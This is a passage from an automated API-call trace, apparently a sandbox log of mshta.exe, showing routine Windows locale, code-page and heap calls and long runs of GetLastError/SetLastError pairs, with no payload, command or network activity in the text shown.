(dwErrCode=0x0) [0060.725] GetLastError () returned 0x0 [0060.725] SetLastError (dwErrCode=0x0) [0060.725] GetLastError () returned 0x0 [0060.726] SetLastError (dwErrCode=0x0) [0060.726] GetACP () returned 0x4e4 [0060.726] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x220) returned 0x5a13e8 [0060.726] GetLastError () returned 0x0 [0060.726] SetLastError (dwErrCode=0x0) [0060.726] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f8cc | out: lpCPInfo=0x18f8cc) returned 1 [0060.726] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f398 | out: lpCPInfo=0x18f398) returned 1 [0060.726] GetLastError () returned 0x0 [0060.726] SetLastError (dwErrCode=0x0) [0060.726] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f328 | out: lpCharType=0x18f328) returned 1 [0060.726] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f7ac, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0060.726] MultiByteToWideChar 
(in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f7ac, cbMultiByte=256, lpWideCharStr=0x18f118, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ獏\x97Ā") returned 256 [0060.726] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ獏\x97Ā", cchSrc=256, lpCharType=0x18f3ac | out: lpCharType=0x18f3ac) returned 1 [0060.726] GetLastError () returned 0x0 [0060.726] SetLastError (dwErrCode=0x0) [0060.726] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0060.726] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f7ac, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0060.726] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f7ac, cbMultiByte=256, lpWideCharStr=0x18f0b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鼬?Ā") returned 256 [0060.727] 
LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鼬?Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0060.727] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鼬?Ā", cchSrc=256, lpDestStr=0x18eea8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0060.727] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18f6ac, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" 
\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x98\x94ÝÙäø\x18", lpUsedDefaultChar=0x0) returned 256 [0060.727] GetLastError () returned 0x0 [0060.727] SetLastError (dwErrCode=0x0) [0060.727] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f7ac, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0060.727] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f7ac, cbMultiByte=256, lpWideCharStr=0x18f0d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鼌?Ā") returned 256 [0060.727] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 
!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鼌?Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0060.727] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鼌?Ā", cchSrc=256, lpDestStr=0x18eec8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0060.727] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18f5ac, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 
!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x98\x94ÝÙäø\x18", lpUsedDefaultChar=0x0) returned 256 [0060.727] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x97b0f0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0060.727] GetLastError () returned 0x0 [0060.727] SetLastError (dwErrCode=0x0) [0060.727] GetLastError () returned 0x0 [0060.727] SetLastError (dwErrCode=0x0) [0060.727] GetLastError () returned 0x0 [0060.727] SetLastError (dwErrCode=0x0) [0060.727] GetLastError () returned 0x0 [0060.728] SetLastError (dwErrCode=0x0) [0060.728] GetLastError () returned 0x0 [0060.728] SetLastError (dwErrCode=0x0) [0060.728] GetLastError () returned 0x0 [0060.728] SetLastError (dwErrCode=0x0) [0060.728] GetLastError () returned 0x0 [0060.728] 
SetLastError (dwErrCode=0x0) [0060.728] GetLastError () returned 0x0 [0060.728] SetLastError (dwErrCode=0x0) [0060.728] GetLastError () returned 0x0 [0060.728] SetLastError (dwErrCode=0x0) [0060.728] GetLastError () returned 0x0 [0060.728] SetLastError (dwErrCode=0x0) [0060.728] GetLastError () returned 0x0 [0060.728] SetLastError (dwErrCode=0x0) [0060.728] GetLastError () returned 0x0 [0060.729] SetLastError (dwErrCode=0x0) [0060.729] GetLastError () returned 0x0 [0060.729] SetLastError (dwErrCode=0x0) [0060.729] GetLastError () returned 0x0 [0060.729] SetLastError (dwErrCode=0x0) [0060.729] GetLastError () returned 0x0 [0060.729] SetLastError (dwErrCode=0x0) [0060.729] GetLastError () returned 0x0 [0060.729] SetLastError (dwErrCode=0x0) [0060.729] GetLastError () returned 0x0 [0060.729] SetLastError (dwErrCode=0x0) [0060.729] GetLastError () returned 0x0 [0060.729] SetLastError (dwErrCode=0x0) [0060.729] GetLastError () returned 0x0 [0060.729] SetLastError (dwErrCode=0x0) [0060.729] GetLastError () returned 0x0 [0060.730] SetLastError (dwErrCode=0x0) [0060.730] GetLastError () returned 0x0 [0060.730] SetLastError (dwErrCode=0x0) [0060.730] GetLastError () returned 0x0 [0060.730] SetLastError (dwErrCode=0x0) [0060.730] GetLastError () returned 0x0 [0060.730] SetLastError (dwErrCode=0x0) [0060.730] GetLastError () returned 0x0 [0060.730] SetLastError (dwErrCode=0x0) [0060.730] GetLastError () returned 0x0 [0060.730] SetLastError (dwErrCode=0x0) [0060.730] GetLastError () returned 0x0 [0060.730] SetLastError (dwErrCode=0x0) [0060.730] GetLastError () returned 0x0 [0060.730] SetLastError (dwErrCode=0x0) [0060.730] GetLastError () returned 0x0 [0060.731] SetLastError (dwErrCode=0x0) [0060.731] GetLastError () returned 0x0 [0060.731] SetLastError (dwErrCode=0x0) [0060.731] GetLastError () returned 0x0 [0060.731] SetLastError (dwErrCode=0x0) [0060.731] GetLastError () returned 0x0 [0060.731] SetLastError (dwErrCode=0x0) [0060.731] GetLastError () returned 0x0 [0060.731] 
SetLastError (dwErrCode=0x0) [0060.731] GetLastError () returned 0x0 [0060.731] SetLastError (dwErrCode=0x0) [0060.731] GetLastError () returned 0x0 [0060.731] SetLastError (dwErrCode=0x0) [0060.731] GetLastError () returned 0x0 [0060.731] SetLastError (dwErrCode=0x0) [0060.732] GetLastError () returned 0x0 [0060.732] SetLastError (dwErrCode=0x0) [0060.732] GetLastError () returned 0x0 [0060.732] SetLastError (dwErrCode=0x0) [0060.732] GetLastError () returned 0x0 [0060.732] SetLastError (dwErrCode=0x0) [0060.732] GetLastError () returned 0x0 [0060.732] SetLastError (dwErrCode=0x0) [0060.732] GetLastError () returned 0x0 [0060.732] SetLastError (dwErrCode=0x0) [0060.732] GetLastError () returned 0x0 [0060.732] SetLastError (dwErrCode=0x0) [0060.732] GetLastError () returned 0x0 [0060.732] SetLastError (dwErrCode=0x0) [0060.732] GetLastError () returned 0x0 [0060.732] SetLastError (dwErrCode=0x0) [0060.732] GetLastError () returned 0x0 [0060.733] SetLastError (dwErrCode=0x0) [0060.733] GetLastError () returned 0x0 [0060.733] SetLastError (dwErrCode=0x0) [0060.733] GetLastError () returned 0x0 [0060.733] SetLastError (dwErrCode=0x0) [0060.733] GetLastError () returned 0x0 [0060.733] SetLastError (dwErrCode=0x0) [0060.733] GetLastError () returned 0x0 [0060.733] SetLastError (dwErrCode=0x0) [0060.733] GetLastError () returned 0x0 [0060.733] SetLastError (dwErrCode=0x0) [0060.733] GetLastError () returned 0x0 [0060.733] SetLastError (dwErrCode=0x0) [0060.734] GetLastError () returned 0x0 [0060.734] SetLastError (dwErrCode=0x0) [0060.734] GetLastError () returned 0x0 [0060.734] SetLastError (dwErrCode=0x0) [0060.734] GetLastError () returned 0x0 [0060.734] SetLastError (dwErrCode=0x0) [0060.734] GetLastError () returned 0x0 [0060.734] SetLastError (dwErrCode=0x0) [0060.734] GetLastError () returned 0x0 [0060.734] SetLastError (dwErrCode=0x0) [0060.734] GetLastError () returned 0x0 [0060.734] SetLastError (dwErrCode=0x0) [0060.734] GetLastError () returned 0x0 [0060.734] 
SetLastError (dwErrCode=0x0) [0060.734] GetLastError () returned 0x0 [0060.735] SetLastError (dwErrCode=0x0) [0060.735] GetLastError () returned 0x0 [0060.735] SetLastError (dwErrCode=0x0) [0060.735] GetLastError () returned 0x0 [0060.735] SetLastError (dwErrCode=0x0) [0060.735] GetLastError () returned 0x0 [0060.735] SetLastError (dwErrCode=0x0) [0060.735] GetLastError () returned 0x0 [0060.735] SetLastError (dwErrCode=0x0) [0060.735] GetLastError () returned 0x0 [0060.735] SetLastError (dwErrCode=0x0) [0060.735] GetLastError () returned 0x0 [0060.735] SetLastError (dwErrCode=0x0) [0060.735] GetLastError () returned 0x0 [0060.735] SetLastError (dwErrCode=0x0) [0060.735] GetLastError () returned 0x0 [0060.736] SetLastError (dwErrCode=0x0) [0060.736] GetLastError () returned 0x0 [0060.736] SetLastError (dwErrCode=0x0) [0060.736] GetLastError () returned 0x0 [0060.736] SetLastError (dwErrCode=0x0) [0060.736] GetLastError () returned 0x0 [0060.736] SetLastError (dwErrCode=0x0) [0060.736] GetLastError () returned 0x0 [0060.736] SetLastError (dwErrCode=0x0) [0060.736] GetLastError () returned 0x0 [0060.737] SetLastError (dwErrCode=0x0) [0060.737] GetLastError () returned 0x0 [0060.737] SetLastError (dwErrCode=0x0) [0060.737] GetLastError () returned 0x0 [0060.737] SetLastError (dwErrCode=0x0) [0060.737] GetLastError () returned 0x0 [0060.737] SetLastError (dwErrCode=0x0) [0060.737] GetLastError () returned 0x0 [0060.737] SetLastError (dwErrCode=0x0) [0060.737] GetLastError () returned 0x0 [0060.737] SetLastError (dwErrCode=0x0) [0060.737] GetLastError () returned 0x0 [0060.737] SetLastError (dwErrCode=0x0) [0060.737] GetLastError () returned 0x0 [0060.737] SetLastError (dwErrCode=0x0) [0060.738] GetLastError () returned 0x0 [0060.738] SetLastError (dwErrCode=0x0) [0060.738] GetLastError () returned 0x0 [0060.738] SetLastError (dwErrCode=0x0) [0060.738] GetLastError () returned 0x0 [0060.738] SetLastError (dwErrCode=0x0) [0060.738] GetLastError () returned 0x0 [0060.738] 
SetLastError (dwErrCode=0x0) [0060.738] GetLastError () returned 0x0 [0060.738] SetLastError (dwErrCode=0x0) [0060.738] GetLastError () returned 0x0 [0060.738] SetLastError (dwErrCode=0x0) [0060.738] GetLastError () returned 0x0 [0060.738] SetLastError (dwErrCode=0x0) [0060.738] GetLastError () returned 0x0 [0060.739] SetLastError (dwErrCode=0x0) [0060.739] GetLastError () returned 0x0 [0060.739] SetLastError (dwErrCode=0x0) [0060.739] GetLastError () returned 0x0 [0060.739] SetLastError (dwErrCode=0x0) [0060.739] GetLastError () returned 0x0 [0060.739] SetLastError (dwErrCode=0x0) [0060.739] GetLastError () returned 0x0 [0060.739] SetLastError (dwErrCode=0x0) [0060.739] GetLastError () returned 0x0 [0060.739] SetLastError (dwErrCode=0x0) [0060.739] GetLastError () returned 0x0 [0060.739] SetLastError (dwErrCode=0x0) [0060.739] GetLastError () returned 0x0 [0060.739] SetLastError (dwErrCode=0x0) [0060.739] GetLastError () returned 0x0 [0060.740] SetLastError (dwErrCode=0x0) [0060.740] GetLastError () returned 0x0 [0060.740] SetLastError (dwErrCode=0x0) [0060.740] GetLastError () returned 0x0 [0060.740] SetLastError (dwErrCode=0x0) [0060.740] GetLastError () returned 0x0 [0060.740] SetLastError (dwErrCode=0x0) [0060.740] GetLastError () returned 0x0 [0060.740] SetLastError (dwErrCode=0x0) [0060.740] GetLastError () returned 0x0 [0060.740] SetLastError (dwErrCode=0x0) [0060.740] GetLastError () returned 0x0 [0060.740] SetLastError (dwErrCode=0x0) [0060.740] GetLastError () returned 0x0 [0060.740] SetLastError (dwErrCode=0x0) [0060.740] GetLastError () returned 0x0 [0060.741] SetLastError (dwErrCode=0x0) [0060.741] GetLastError () returned 0x0 [0060.741] SetLastError (dwErrCode=0x0) [0060.741] GetLastError () returned 0x0 [0060.741] SetLastError (dwErrCode=0x0) [0060.741] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1c8) returned 0x5a1610 [0060.741] GetLastError () returned 0x0 [0060.741] SetLastError (dwErrCode=0x0) [0060.741] GetLastError () returned 0x0 
[0060.741] SetLastError (dwErrCode=0x0) [0060.741] GetLastError () returned 0x0 [0060.741] SetLastError (dwErrCode=0x0) [0060.741] GetLastError () returned 0x0 [0060.742] SetLastError (dwErrCode=0x0) [0060.742] GetLastError () returned 0x0 [0060.742] SetLastError (dwErrCode=0x0) [0060.742] GetLastError () returned 0x0 [0060.742] SetLastError (dwErrCode=0x0) [0060.742] GetLastError () returned 0x0 [0060.742] SetLastError (dwErrCode=0x0) [0060.742] GetLastError () returned 0x0 [0060.742] SetLastError (dwErrCode=0x0) [0060.742] GetLastError () returned 0x0 [0060.742] SetLastError (dwErrCode=0x0) [0060.742] GetLastError () returned 0x0 [0060.742] SetLastError (dwErrCode=0x0) [0060.742] GetLastError () returned 0x0 [0060.742] SetLastError (dwErrCode=0x0) [0060.742] GetLastError () returned 0x0 [0060.743] SetLastError (dwErrCode=0x0) [0060.743] GetLastError () returned 0x0 [0060.743] SetLastError (dwErrCode=0x0) [0060.743] GetLastError () returned 0x0 [0060.743] SetLastError (dwErrCode=0x0) [0060.743] GetLastError () returned 0x0 [0060.743] SetLastError (dwErrCode=0x0) [0060.743] GetLastError () returned 0x0 [0060.743] SetLastError (dwErrCode=0x0) [0060.743] GetLastError () returned 0x0 [0060.743] SetLastError (dwErrCode=0x0) [0060.743] GetLastError () returned 0x0 [0060.743] SetLastError (dwErrCode=0x0) [0060.743] GetLastError () returned 0x0 [0060.743] SetLastError (dwErrCode=0x0) [0060.743] GetLastError () returned 0x0 [0060.744] SetLastError (dwErrCode=0x0) [0060.744] GetLastError () returned 0x0 [0060.744] SetLastError (dwErrCode=0x0) [0060.744] GetLastError () returned 0x0 [0060.744] SetLastError (dwErrCode=0x0) [0060.744] GetLastError () returned 0x0 [0060.744] SetLastError (dwErrCode=0x0) [0060.744] GetLastError () returned 0x0 [0060.744] SetLastError (dwErrCode=0x0) [0060.744] GetLastError () returned 0x0 [0060.745] SetLastError (dwErrCode=0x0) [0060.745] GetLastError () returned 0x0 [0060.745] SetLastError (dwErrCode=0x0) [0060.745] GetLastError () returned 0x0 
